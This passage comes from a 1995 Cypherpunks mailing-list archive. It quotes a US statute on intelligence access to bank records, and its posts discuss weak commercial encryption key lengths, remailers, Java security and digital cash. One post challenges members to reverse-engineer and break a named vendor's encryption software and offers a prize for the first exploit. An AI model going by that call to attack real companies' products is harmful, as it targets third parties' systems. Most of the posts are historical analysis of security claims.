of the information obtained through this law.  Note that if banking
privacy is violated for reasons which are not related to
counter-intelligence operations, the victim is unlikely to be in a
position to seek relief from the courts because the privacy violation
is likely to remain secret.

I've enclosed the law below.  I'm not a lawyer, so it raises more
questions than it answers.  Perhaps the more skilled readers on the
list will be able to deduce the implications.

The U.S. Code is available at http://www.pls.com:8001/his/usc.html

This particular law is available at the improbable URL:
http://www.pls.com:8001/cgi-bin/taos_doc.pl?unix+0+uscode+17566+query+a+Government+authority+authorized+to+conduct+foreign+counter+%25BREAK%25+uscode%3a

Here is the law itself:

-CITE-

   12 USC Sec. 3414                                             01/24/94

-EXPCITE-

   TITLE 12 - BANKS AND BANKING
   CHAPTER 35 - RIGHT TO FINANCIAL PRIVACY

-HEAD-

   Sec. 3414. Special procedures

-STATUTE-

     (a)(1) Nothing in this chapter (except sections 3415, 3417, 3418,
   and 3421 of this title) shall apply to the production and
   disclosure of financial records pursuant to requests from -
       (A) a Government authority authorized to conduct foreign
     counter- or foreign positive-intelligence activities for purposes
     of conducting such activities; or
       (B) the Secret Service for the purpose of conducting its
     protective functions (18 U.S.C. 3056; 3 U.S.C. 202, Public Law
     90-331, as amended).
     (2) In the instances specified in paragraph (1), the Government
   authority shall submit to the financial institution the certificate
   required in section 3403(b) of this title signed by a supervisory
   official of a rank designated by the head of the Government
   authority.
     (3) No financial institution, or officer, employee, or agent of
   such institution, shall disclose to any person that a Government
   authority described in paragraph (1) has sought or obtained access
   to a customer's financial records.
     (4) The Government authority specified in paragraph (1) shall
   compile an annual tabulation of the occasions in which this section
   was used.
     (5)(A) Financial institutions, and officers, employees, and
   agents thereof, shall comply with a request for a customer's or
   entity's financial records made pursuant to this subsection by the
   Federal Bureau of Investigation when the Director of the Federal
   Bureau of Investigation (or the Director's designee) certifies in
   writing to the financial institution that such records are sought
   for foreign counterintelligence purposes and that there are
   specific and articulable facts giving reason to believe that the
   customer or entity whose records are sought is a foreign power or
   an agent of a foreign power as defined in section 1801 of title 50.
     (B) The Federal Bureau of Investigation may disseminate
   information obtained pursuant to this paragraph only as provided in
   guidelines approved by the Attorney General for foreign
   intelligence collection and foreign counterintelligence
   investigations conducted by the Federal Bureau of Investigation,
   and, with respect to dissemination to an agency of the United
   States, only if such information is clearly relevant to the
   authorized responsibilities of such agency.
     (C) On a semiannual basis the Attorney General shall fully inform
   the Permanent Select Committee on Intelligence of the House of
   Representatives and the Select Committee on Intelligence of the
   Senate concerning all requests made pursuant to this paragraph.
     (D) No financial institution, or officer, employee, or agent of
   such institution, shall disclose to any person that the Federal
   Bureau of Investigation has sought or obtained access to a
   customer's or entity's financial records under this paragraph.
     (b)(1) Nothing in this chapter shall prohibit a Government
   authority from obtaining financial records from a financial
   institution if the Government authority determines that delay in
   obtaining access to such records would create imminent danger of -
       (A) physical injury to any person;
       (B) serious property damage; or
       (C) flight to avoid prosecution.
     (2) In the instances specified in paragraph (1), the Government
   shall submit to the financial institution the certificate required
   in section 3403(b) of this title signed by a supervisory official
   of a rank designated by the head of the Government authority.
     (3) Within five days of obtaining access to financial records
   under this subsection, the Government authority shall file with the
   appropriate court a signed, sworn statement of a supervisory
   official of a rank designated by the head of the Government
   authority setting forth the grounds for the emergency access.  The
   Government authority shall thereafter comply with the notice
   provisions of section 3409(c) of this title.
     (4) The Government authority specified in paragraph (1) shall
   compile an annual tabulation of the occasions in which this section
   was used.

-SOURCE-

   (Pub. L. 95-630, title XI, Sec. 1114, Nov. 10, 1978, 92 Stat. 3707;
   Pub. L. 97-320, title IV, Sec. 432(b), Oct. 15, 1982, 96 Stat.
   1527; Pub. L. 99-569, title IV, Sec. 404, Oct. 27, 1986, 100 Stat.
   3197.)

-REFTEXT-

                            REFERENCES IN TEXT
     Public Law 90-331, as amended, referred to in subsec. (a)(1)(B),
   is Pub. L. 90-331, June 6, 1968, 82 Stat. 170, as amended, which is
   set out as a note under section 3056 of Title 18, Crimes and
   Criminal Procedure.

-MISC2-

                                AMENDMENTS
     1986 - Subsec. (a)(5). Pub. L. 99-569 added par. (5).
     1982 - Subsec. (b)(2). Pub. L. 97-320 struck out ''of'' after
   ''financial institution''.

-SECREF-

                  SECTION REFERRED TO IN OTHER SECTIONS
     This section is referred to in sections 3402, 3409, 3421 of this
   title.
  __________________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 20 Oct 95 10:25:55 PDT
To: Steve <privsoft@ix.netcom.com>
Subject: Re: responce to graphic encryption replies
Message-ID: <Pine.3.89.9510201735.A11783-a100000-a100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


Urk.. not wanting to start up the "MIME is Evil, ASCII Forever !" thread
again, but it would help those of us who have to use MIME-supporting mail
programs if you didn't send messages as MIME attachments, pine is too
stupid to actually include the attachment in the reply... 

> How Secure Can PrivaSoft Be?

>  The typical policy is to limit the allowable cryptographic strength of
> commercial products to a level that is strong enough for commercial
> purposes. 

Sadly, that's not true. The typical policy is to limit the cryptographic
strength to a level that the NSA or a few hackers can break. IMHO 40-bit
RC4 doesn't come close to being strong enough for commercial purposes, at
least for anything other than trivial messages. 

> The cryptographic engine of PrivaSoft PrivaSoft uses a pseudo-random
> generator that is seeded by a 9 digit number uniformly normalized from
> the user's secret key. 

So that's about 30 bits ? Hmm, the computer on my desk kicked butt five
years ago, but today it's not much use for anything other than an
X-terminal, and slower than my $1500 laptop. Yet when we were cracking
SSL, it was searching a 28-bit chunk of keyspace every hour or so merely
using the idle cycles. In which case, if it's no harder to detect a
correct decryption than SSL, and no slower to decrypt than RC4, I could
crack your messages in about 4 hours by myself (of course, from what
you've said, it almost certainly *is* harder than that, the question is
*how much* harder).

Incidentally, how do you intend to distribute these secret keys ? Do you 
have some kind of RSA layer on top, or do I just have to call everyone I 
want to send faxes to and ask for their key ?

> The 9 digit key, when applied to analogue, the graphical encryption is

What do you mean here ? What's analogue in this system ? You're running 
it on digital data in a digital computer, right ?

> equivalent to a much longer key applied to alphanumeric encryption. 

Perhaps, but it would have to be at least 1000 times harder merely to 
make it as secure as RC4-40, which we've already shown to be insecure.

> PrivaSoft is unique in being a one-stop product than can serve all types
> of modern correspondence, including E-mail, fax and paper printouts. 
                                      ^^^^^^
This seems to be a direct contradiction of what you said above, unless you
plan to send email by creating a bitmap, encrypting the bitmap, and then 
sending that to the recipient. Some of us don't have T1 links to support 
that kind of mail... and it won't support, say, sending an executable 
file or C source code in that message and being able to use it at the 
other end.

It's also hardly unique, as PGP can readily encrypt any kind of digital 
data, with much better security.

	Mark


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 20 Oct 95 10:35:32 PDT
To: cypherpunks@toad.com
Subject: Re: responce to graphic encryption replies
Message-ID: <Pine.3.89.9510201855.A11783-c100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain

I said :

>  This message is in MIME format.  The first part should be readable text,
>  while the remaining parts are likely unreadable without MIME-aware tools.
 
AAaarrrgh !

> Urk.. not wanting to start up the "MIME is Evil, ASCII Forever !" thread
> again, but it would help those of us who have to use MIME-supporting mail
> programs if you didn't send messages as MIME attachments, pine is too
> stupid to actually include the attachment in the reply...

Thank you pine.. I guess it's time to add POP support to privtool so I 
can use a proper mailer...

	Mark



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Fri, 20 Oct 95 10:56:21 PDT
To: privsoft@ix.netcom.com
Subject: Re: responce to graphic encryption replies
In-Reply-To: <199510191953.MAA29605@ix10.ix.netcom.com>
Message-ID: <199510201730.TAA00497@soikko.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> PrivaSoft uses a pseudo-random generator that is seeded by a 9 digit
> number uniformly normalized from the user's secret key.  The engine is
> proprietary, designed according to the rules of modern cryptology to
> make the best use of the allowable key length.

Uhhuh, 32 bit keys?  Now you have really convinced me that it is not
secure even against the neighbours bright young kids.

    Tatu Ylonen <ylo@cs.hut.fi>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 20 Oct 95 11:46:25 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
Message-ID: <Pine.3.89.9510201903.A11783-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Oct 1995, Timothy C. May wrote:

> "You have a piece of mail awaiting at our mail delivery service. The
> originator is unknown. The title of the message is "Tentacles of Medusa
> Must Die!" You may retrieve this message by replying to this notification
> with the word "Yes" anywhere in the Subject field. This message will be
> kept for 60 days and then deleted."

I suspect that I could easily hack this into Mixmaster in a day or two,
but wouldn't it open you to attacks where Anonymous Fed, say, sends
terrorist kiddy-porn through your remailer and busts your ISP during those
60 days for possession ? I'm not sure if it would be better or worse than
current setups from that point of view. 

I might do it anyway, and set it up to only forward PGP-encrypted 
messages, but I certainly wouldn't be able to keep messages for 60 days 
with only a MB or so to spare.

	Mark

"Yes Judge, when we siezed their computer we found 300 MB of *kiddy porn* 
and plans for *terrorist attacks* [that we'd mailed to the in the last two 
weeks...]"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Fri, 20 Oct 95 20:13:18 PDT
To: cypherpunks@toad.com
Subject: Challenge:  Hack Elementrix!
Message-ID: <199510210308.UAA07881@elmos.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain




Everyone,

I think that with all the recent attention to Netscape and Microsoft that
another target has been altogether overlooked:  Elementrix POTP <spit>.
 
> New encryption method announced
> 
> Sept. 29 -- Elementrix Technologies has announced a breakthrough in data
> encryption that does away with the need for passwords and public/private
> keys, instead working transparently at either an application or hardware
> level. Using the One Time Pad method of encryption -- acknowledged for a
> long time as being a superior encryption method -- Elementrix has released
> both an FTP and E-Mail package that makes sending secure messages as easy
> as just clicking a button. Its Power One Time Pad (POTP) technology
> promises to ensure that in the very near future, the entire Internet can
> become a fundamentally secure place.

Elementrix is on the Web.  http://www.elementrix.co.il/

Reposted from sci.crypt:

In article <30803C0E.2781E494@unix.ka9q.ampr.org>, Phil Karn <karn@unix.ka9q.ampr.org> writes:
> This announcement pegs my bogometer (a device for measuring bogons,
> the elementary particle of bogosity).
> 
> Readers of the Skeptical Inquirer and other similar publications will
> recognize all the classic signs of a scam, either deliberate or
> self-delusionary:
> 
> 1. Breathless, overhyped language ("revolutionary", "breakthrough", etc)
> 
> 2. Clear misstatements of well-established theoretical principles
> (the discussion of the one-time pad)
> 
> 3. Reluctance to get specific, usually by citing proprietary concerns.
> When this is combined with a claim that a patent application has been
> filed, this is a clear sign of bogosity -- one's patent
> rights can be compromised only by publishing *before* filing, not after.
> 
> Unless, of course, the claim is rejected by the patent office,
> which is almost unheard of these days even for clearly bogus and/or
> trivial "inventions".
> 
> Phil

While Elementrix has failed to provide any detailed technical information
(specifications, source code, etc.) this is not entirely out of reach.

You can obtain an evaluation copy of their "secure" FTP client from
ftp://ftp.elementrix.co.il/pub/secftp/

This appears to be a binary for Microsoft Windoze.

The server at ftp.elementrix.co.il is a "secure" server.  Note:

    ftp> open ftp.elementrix.co.il
    Connected to ftp.elementrix.co.il.
    220 sunex FTP server [Elementrix POTP(1.51) Secure FTP(1.5-3)] ready.
    Name (ftp.elementrix.co.il:dwa): anonymous
    331 Guest login ok, send your complete e-mail address as password.
    Password:
    230 Guest login ok, access restrictions apply.
    ftp> close
    221 Goodbye.
    ftp>

So there you go.

Sure, commented source code with accompanying specifications for an
implementation are nice, but did Ian and David have such luxuries for
their Netscape hack?

I will confess that I have not actually tried running their software,
let alone reverse-engineering it, as I am Windoze-challenged (running
on SunOS 4.1.x as we speak).  However, I'm sure there are probably many
people on this list with suitable Windoze platforms complete with the
necessary reverse engineering tools.

In many ways, Elementrix is a more enjoyable target.  Their claims of
security reek of more marketing hype than even Microsoft would stoop to,
and their use of the term "One Time Pad" is disgusting.  At least Netscape
is trying to use respectable crypto algorithms and is being open about
their code.  These people deserve to flamed far more than Netscape (and
even Microsoft) ever did.

Perhaps someone could even convince Sameer to do T-shirts.  I'll even
agree to cover the cost of one for the first exploit.  How about it,
Sameer? :)


Dana W. Albrecht
dwa@corsair.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 20 Oct 95 17:52:09 PDT
To: owner-cypherpunks@toad.com
Subject: Re: textbooks
Message-ID: <9510210049.AA18758@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I have also heard good things about a book by Warwick Ford.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 20 Oct 95 13:46:37 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
Message-ID: <Pine.3.89.9510202106.A11783-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Oct 1995, Timothy C. May wrote:

> Drives are cheap. I just saw a 1.2 GB for $195 (internal, PC). I suspect
> that anyone sweating over having only a MB to spare shouldn't be running a
> remailer.

The trouble is, I can't just add a 1.2 GB disk to my ISP and use it, I 
have to pay monthly for more space. In addition, it would be time-limited 
to three months or so in any case, as I'm going to be travelling and 
wouldn't be able to support it.

> (Not a slam against Mark, just a statement that there are certain minimal
> capabilities I'd expect to see, and not having free disk space is a serious
> problem.)

Yeah, I was mostly intending it to be a proof-of-concept, not really as an
operational remailer at this point. If it was available as a patch for
Mixmaster, say, then anyone who wanted to run such a remailer and had the
disk space available, would be able to do so. 

BTW, how would the ECPA apply to, say, bouncing non-PGP messages ? From 
the sound if it, doing that would be worse from a legal standpoint than 
not doing it, as it would imply I was censoring the mailfeed in some 
fashion.

	Mark






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SysAdmin <admin@dcwill.com>
Date: Fri, 20 Oct 95 21:46:37 PDT
To: cypherpunks@toad.com
Subject: Re: textbooks
In-Reply-To: <9510210049.AA18758@sulphur.osf.org>
Message-ID: <199510210446.VAA22741@python.ee.unr.edu>
MIME-Version: 1.0
Content-Type: text/plain


'Rich Salz' wrote:
 
> I have also heard good things about a book by Warwick Ford.

Along the same lines, I just picked up "Cryptography, Theory and 
Practice" by Douglas R. Stinson (CRC Press, 1995). It seems to be 
very comprehensive but lacks the readability of Schneier. This is 
definitely not a beginner's book, but it would be useful to someone 
seeking greater insight into the math behind crypto.


Fred  <admin@dcwill.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 20 Oct 95 21:56:18 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Java good for security? (was: 50 ways...)
In-Reply-To: <199510201919.PAA20537@clark.net>
Message-ID: <Pine.SOL.3.91.951020212519.14955B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



Earlier on, when the Java threads started, I posted several responded to 
a post like this explaining why java theoretically protects against 
attacks like the ones mentioned, and suggested what parts of the code 
need to be examined/attacked to violate the security assumptions. 
Everybody here knows what you can do if you can execute any code you 
want; to show a breach you must show that the code you want can be executed.

Although I wouldn't put money on the current implementation of the Java 
VM is 100% perfect, I am pretty confident that a fully trusted VM can be 
built (the instruction set and type verifiers are very simple and 
conservative). Adding in the garbage collector and the thread system may 
make things more complicated, but hopefully these factors won't make 
things too bad. 

Once you have a trusted VM and core runtime, all you need to do is add 
once the run-time classes you need and are able to verify to your desired 
level of trust, and you have a reasonably trusted language to write your 
programs in. This, and several other features of java should make it 
easier to write trusted code.

	1) Exceptions. Java has exceptions, and like CLU on prozac, nags 
	   you if you don't explicitly catch or pass thru them. Errors 
	   which are ignored are a very common cause of security holes.
	2) Bounds checked arrays. Can't overflow, making the world safe 
	   for stack frames everywhere.
	3) Garbage collection - no leaks, and no use of freed memory.
	4) Real access protection  for private members - easier to make sure
	   info isn't leaking if all access is mediated through a single unit.
	
Hmmm. What other features would be good for writing trusted code like 
network servers? Anyone got any cites on language issues and security? 
That don't involve ADA :-)?

Simon


----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 20 Oct 95 19:09:58 PDT
To: Holger Reif <Holger.Reif@PrakInf.TU-Ilmenau.DE>
Subject: Re: digital cash and identity disclosure
In-Reply-To: <9510200933.AA02681@PrakInf.TU-Ilmenau.DE>
Message-ID: <Pine.SUN.3.91.951020220855.25323J-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


i would like to propose the following radical idea:  Chaumian digicash is 
a nice curiosity.  The future in the mdeium term (10+ years) for better 
or worse belongs to Mondex.

Comments?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@cnw.com>
Date: Fri, 20 Oct 95 22:26:53 PDT
To: "'cypherpunks@toad.com>
Subject: M$ Windows 95 swap files, disk recovery & PGP
Message-ID: <01BA9F3B.A68179E0@king1-16.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


	Hi there, 
I read about this list in the Electronic Engineering Times, so I scored PGP as soon as I could.
My ?? is this: When I create a document on M$ Word or XL and then PGP it, how could I eliminate the plaintext left in the swap file?  Now, I understand the PGP -w command but that only wipes the original
plaintext. 
	My other ?? is if my disk is seized by the S.S. , how easy would it be for  them to recover
old plaintext messages? 
	Thanks,
	Eric



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 20 Oct 95 21:01:16 PDT
To: privsoft@ix.netcom.com
Subject: Re: [reformatted] how secure can privasoft be?
In-Reply-To: <199510202040.QAA29119@light.lightlink.com>
Message-ID: <199510210401.AAA16706@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


> PrivaSoft has obtained an export license from the governments of Israel and 
> the USA.  
[...]
> PrivaSoft willfully complies with these regulations as it is a commercial 
> product, and it is not intended for national security applications with its 
> current key length which is the maximum legally allowable for commercial 
> users.
> 
> The cryptographic engine of PrivaSoft
> 
> PrivaSoft uses a pseudo-random generator that is seeded by a 9 digit number 
> uniformly normalized from the user's secret key.  The engine is proprietary, 
> designed according to the rules of modern cryptology to make the best use of 
> the allowable key length.

This seems paradoxical. PrivaSoft uses a key approximately 30 bits long. It
is claimed that the key length "is the maximum legally allowable for 
commercial users". How does this square with (to pick a familiar example) the
40 bit RC4 keys used in the exportable international version of Netscape 
Navigator ?

Two possible explanations I can imagine are:

(0) PrivaSoft actually uses a key longer than 9 digits, and someone just made
    a mistake somewhere along the line. Perhaps it's really 9 extended-ASCII
    characters == 9 bytes == 72 bits, rather than 9 digits == 
    ceil(9*lg(10)) bits == 30 bits.

(1) NSA believes it is about (2^40)/(2^30) == 1024 times harder to break
    the PrivaSoft scheme than SSL with 40-bit RC4. That would be remarkable.

[...]
> The use of default keys
> 
> When secret keys or passwords are used by laymen, there is always a conflict 
> between security and convenience:  The user tends to use fixed, easily 
> memorized keys again and again, while the cryptoanalyst only waits for an 
> opportunity to see many messages encrypted by the same key.  

I get the feeling you are confusing two separate issues here. Users do tend 
to use easily memorized passphrases, which is indeed a problem, because such
passphrases are in general easy to guess. But cryptosystems are generally
meant to resist attacks based on the cryptanalyst gaining access to many 
ciphertexts, even if all were encrypted with a single key.

[...]
> A simple example:  For a short message, increasing the font 
> size of the text by a factor of 10 will significantly increase the time 
> required for breaking the encryption.

Anyone know how to get 120 point text in LaTeX ?

> Customized versions of PrivaSoft
> 
> PrivaSoft is unique in being a one-stop product than can serve all types of 
> modern correspondence, including E-mail, fax and paper printouts.  Special 
> applications that need and can obtain a license to use non-commercial 
> cryptographic engines can be accommodated by special versions of PrivaSoft.  
> The cryptographic engine can be customer-furnished and customer integrated, 
> however - since in some areas the integration of this product with certain 
> cryptographic engines may be considered "munitions", each customized version 
> of the product has to be licensed separately in accordance with the laws of 
> the territory where it was created and used.

I think this is a smart idea.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks
Date: Sat, 21 Oct 95 00:13:19 PDT
Subject: No Subject
Message-ID: <9510210713.AA03694@toad.com>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 21 Oct 95 00:06:43 PDT
To: cypherpunks@toad.com
Subject: Article on Digital Cash in "Worth"
Message-ID: <acade6614d0210045f23@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I don't recall seeing mention of this, so here goes.

The October 1995 issue of "Worth" magazine has a fairly long article about
digital cash in several forms, and about David Chaum's Digicash in
particular. It has a more detailed description of his Amsterdam operation,
and his history, than I recall seeing anywhere else.

While I'm on the subject of Chaum and Digicash, several recent posts here
have commented about my dislike of Digicash's current approach, or about my
criticisms of the current approach. Given the recent "piling on" aimed at
Netscape (for various reasons I think are obvious--see Note), I don't want
to be perceived as one of Digicash's leading critics.

The fact is, I'm not in the business of trying to deploy any kind of
digital cash, so I don't follow too closely the ins and outs of what
various "digital money" systems are currently offering. I have some
long-range interests in the societal implications of truly anonymous
digital cash, and argue the issues frequently, but I avoid worrying
overmuch about Mondex vs. First Virtual vs. QuickenCash vs. whatever.

Note: About half of all posts to the CP list for the past several weeks
have somehow involved Netscape. The attacks on Netscape have been
impressive, but many of the posts have a "me too" flavor, sort of the way
my smaller cat takes every opportunity to nip at my larger cat when the
larger cat is in distress. The phrase "kicking them when they're down"
comes to mind. Not that the issues aren't real, just that a lot of folks
want to be the "next Goldberg and Wagners," or that they want to add their
two cents about how Netscape is blowing it.

I stay out of this, but I certainly don't want to see Digicash given the
same treatment. Their current product may not be all that some of us desire
(in terms of anonymity, for example), but it sure does beat the
alternatives in essential ways.

I don't want to see Netscape so trashed that people turn to lesser-tested
alternatives without good reason (Microsoft Network being one example), and
I don't want to see Digicash so trashed that people turn to some product
like Mondex.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 20 Oct 95 21:23:58 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Java power
In-Reply-To: <199510192201.PAA14221@kiwi.cs.berkeley.edu>
Message-ID: <199510210424.AAA17318@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


[in retrospect, not much direct crypto relevance in my reply]

Raph Levien writes:
>    Another scenario which works is email, even including transparent
> encryption. This one is interesting to me, so I'll go into a little
> more detail.
>    In this scenario, the server acts as a file server for keyrings
> (both public and secret) and mail spools. Here's a typical sequence of
> events for me getting my mail and replying to one message:
> 
> 1. I call up the JavaMail web page, which is just a wrapper for the
> JavaMail applet.
> 
> 2. The JavaMail applet starts with a forms-style login screen. I type
> my username.
> 
> 3. The applet asks the server for my mail spool (given the username
> and perhaps also a password for authentication).
> 
> 4. The applet displays my mail spool on the screen and lets me fiddle
> with it, scrolling through it, reading messages, etc.
[...steps 5-10 elided...]
>    To me, this is an exciting scenario. Note that, as long as you
> trust the browser, this lets you read your mail from anywhere.

I'm trying to mentally compare this scenario with the use of a 
cryptographically-outfitted mailer operated through an encrypted telnet 
session. 

First of all, I suppose the browser has groovy bells and whistles to spice
up reading email. Maybe you could run a snazzy GUI standalone mailer in some
windowing protocol through the encrypted telnet link as an alternative. This 
is largely irrelevant to me personally, but could make a huge difference to 
the hoi polloi.

Ignoring such interface concerns, what kinds of situations would be conducive
to the JavaMail approach but not, say, ssh+Elm+PGP ?  Perhaps I'm visiting
someone where there's no local POP for my ISP. The friend I'm visiting has 
e.g. an AOL account. I would like to read mail on my remote account via her
AOL browser. Am I wrong in assuming that I couldn't execute a telnet: URL
with the AOL browser ?

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick at Jihad <strick@yak.net>
Date: Mon, 23 Oct 95 13:40:44 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: The NSA Visits Compendium
In-Reply-To: <199510172323.QAA27433@comsec.com>
Message-ID: <199510210110.BAA00135@jihad.yak.net>
MIME-Version: 1.0
Content-Type: text


> So, send me your examples. Supply as much detail as you can, including
> company names if possible. I'll accept "unnamed sources" if they are
> _primary_ sources, but no "friend of a friend told me that...," unless the
> details look very convincing.


Tim, a friend comments that if you're serious about getting
reports this way, you should contact one of the human rights
groups (Amnesty International, Article 19...) that gathers
reports which are generally believed to be accurate under
much more threatening situations.

I thought it a good comment.  I've worked for amnesty before,
and know of their reputation, but now how they attained it...

	strick





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an407769@anon.penet.fi (jerry the golden retriever)
Date: Fri, 20 Oct 95 19:32:20 PDT
To: cypherpunks@toad.com
Subject: faxes are not secure
Message-ID: <9510210219.AA22436@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


BBC Discovers Faxes Are Not Secure (no shit, Sherlock)
BLACKPOOL, LANCASHIRE, ENGLAND, 1995 OCT 19 (NB) -- The British Broadcasting
Corporation (BBC) found out late last week that faxes are not a secure
transmission system. After faxing a copy of a top secret internal management
document to a BBC senior staying at the Pembroke Hotel in Blackpool, where
the Conservative Party Conference took place all last week, BBC executives
were aghast to discover that the fax was sent to the room of Nigel Nelson, a
journalist with The People newspaper, who was also staying at the hotel.

The mis-route for the fax was caused by the fact that Nelson had advised
hotel staff that he was expecting an urgent fax, while the BBC did not notify
the recipient that a fax was on its way. Reception staff at the hotel assumed
that the incoming fax was meant for Nelson and passed it along to him.

Like all good journalists, Nelson realized he had a potential scoop and
passed along the story to the paper, which duly published details of the fax,
along with a brief mention of how the fax came into its hands.

The BBC, meanwhile, has complained loudly that the fax should have been
dispatched to Colin Browne head of the BBC's corporate affairs office, who
was hosting a reception for conference delegates at the hotel.

The fax was send from Leigh Jackson, head of the BBC's Communication Planning
office, and outlined management's worries over job losses and the potential
effects of a likely strike if the British Government goes ahead, as many
think it will, with privatizing the BBC's TV and radio transmitter network in
the UK.

The fax also allegedly said that the BBC would press the government to pass
along at least some of the expected UKP100 million that the sale of the
1,400-strong transmitter network would generate, to the BBC as income for the
state TV service.

Neither the hotel nor the BBC is making any comment about the incident, but
the paper claims that it ran the story with the interest of the public in
mind and that how the fax fell into its reporter's hands was not its concern.

In an editorial in The People newspaper, which was published on Sunday,
Nelson said that "firing off secret faxes to busy hotels without someone
ready to receive them is asking for trouble."

Nelson went on to say that the story was printed, as it was in the public
interest to know what the country's TV company was planning to do with its
assets. In the UK, any TV owner or user has to pay the BBC a license fee of
around $150 a year to receive any form of terrestrial TV transmissions.

Nelson claims that privatizing the transmitter network, while not impinging
on the BBC's operations itself, may not be in the public interest in the long
run. "Privatization could lead to foreign companies muscling in on the most
famous broadcasting network in the world," he said in his editorial.

In a prepared statement, the BBC said that the document was not policy and
was written by a junior member of staff, and therefore was not as sensitive
as the newspaper had made out.

"We were victims of technology," the BBC said.

(Steve Gold/19951018)
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sat, 21 Oct 95 02:34:51 PDT
To: cypherpunks@toad.com, gnu
Subject: ADMIN: Cypherpunks list meltdown, temporary delay in postings
Message-ID: <9510210931.AA02772@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Somebody started forwarding every new cypherpunks message BACK to the
mailing list.  Each such message would, of course, trigger yet another
message back to the list, resulting in a runaway situation.  My guess
is that it's caused by a bug in a procmail script being run by one of
three people at io.com.  We're investigating.

Meanwhile to break the loop I am manually screening cypherpunks messages, 
which will result in multi-hour delays before your posting is seen by
the list (since I only look at new stuff every few hours).  I've yanked
the three suspect users, and can probably turn it all back on sometime
on Saturday.  If you have urgent messages to go out, cc them to me
personally and I'll probably notice them sooner.

By the way, Hugh and I will probably be upgrading our version of
Sendmail within the next few weeks, so you can possibly expect some
further funny behaviour while we test it.  I hope it isn't nearly as
funny as this last meltdown.

Don't worry, I didn't really write this message.  The NSA had a few
glitches in their MITM impersonation of toad.com, and posting this to
reassure you that everything is OK.  :-)

	John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Sat, 21 Oct 95 03:21:36 PDT
To: List <cypherpunks@toad.com>
Subject: WinNews Special Issue (fwd)
